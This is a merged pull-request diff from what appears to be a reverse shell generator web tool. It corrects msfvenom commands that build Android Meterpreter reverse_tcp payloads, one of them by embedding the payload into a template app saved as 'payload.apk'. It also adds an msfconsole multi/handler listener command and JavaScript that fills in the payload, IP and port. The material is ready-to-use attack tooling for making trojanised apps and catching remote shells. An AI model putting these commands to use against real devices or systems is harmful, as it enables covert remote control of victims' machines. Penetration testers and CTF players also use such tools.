Merge pull request #37 from epi052/msfconsole-listeners

added msfconsole listeners; minor bugfixes for msf payloads
This commit is contained in:
Ryan Montgomery 2021-04-05 11:06:02 -04:00 committed by GitHub
commit 2e982aa1fd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 22 additions and 3 deletions

View File

@ -327,12 +327,12 @@ const msfvenomCommands = withCommandType(
}, },
{ {
"name": "Android Meterpreter Reverse TCP", "name": "Android Meterpreter Reverse TCP",
"command": "msfvenom -a x64 --platform android p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk", "command": "msfvenom -a x64 --platform android -p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk",
"meta": ["msfvenom", "android", "android", "reverse"] "meta": ["msfvenom", "android", "android", "reverse"]
}, },
{ {
"name": "Android Meterpreter Embed Reverse TCP", "name": "Android Meterpreter Embed Reverse TCP",
"command": "msfvenom -a x64 --platform android -x <app.apk> android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk", "command": "msfvenom -a x64 --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
"meta": ["msfvenom", "android", "android", "reverse"] "meta": ["msfvenom", "android", "android", "reverse"]
}, },
{ {
@ -357,7 +357,8 @@ const rsgData = {
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'], ['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'], ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
['powercat', 'powercat -l -p {port}'] ['powercat', 'powercat -l -p {port}'],
['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
], ],
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],

View File

@ -80,6 +80,7 @@
const rsg = { const rsg = {
ip: localStorage.getItem('ip') || '10.10.10.10', ip: localStorage.getItem('ip') || '10.10.10.10',
port: localStorage.getItem('port') || 9001, port: localStorage.getItem('port') || 9001,
payload: localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp',
shell: localStorage.getItem('shell') || rsgData.shells[0], shell: localStorage.getItem('shell') || rsgData.shells[0],
listener: localStorage.getItem('listener') || rsgData.listenerCommands[0][1], listener: localStorage.getItem('listener') || rsgData.listenerCommands[0][1],
encoding: localStorage.getItem('encoding') || 'None', encoding: localStorage.getItem('encoding') || 'None',
@ -137,6 +138,21 @@
return reverseShellData.command; return reverseShellData.command;
}, },
getPayload: () => {
if (rsg.commandType === 'MSFVenom') {
let cmd = rsg.getReverseShellCommand();
// msfvenom -p windows/x64/meterpreter_reverse_tcp ...
let regex = /\s+-p\s+(?<payload>[a-zA-Z0-9/_]+)/;
let match = regex.exec(cmd);
if (match) {
return match.groups.payload;
}
}
return 'windows/x64/meterpreter/reverse_tcp'
},
generateReverseShellCommand: () => { generateReverseShellCommand: () => {
let command let command
@ -306,6 +322,8 @@
let command = listenerSelect.value; let command = listenerSelect.value;
command = rsg.highlightParameters(command) command = rsg.highlightParameters(command)
command = command.replace('{port}', rsg.getPort()) command = command.replace('{port}', rsg.getPort())
command = command.replace('{ip}', rsg.getIP())
command = command.replace('{payload}', rsg.getPayload())
if (rsg.getPort() < 1024) { if (rsg.getPort() < 1024) {
privilegeWarning.style.visibility = "visible"; privilegeWarning.style.visibility = "visible";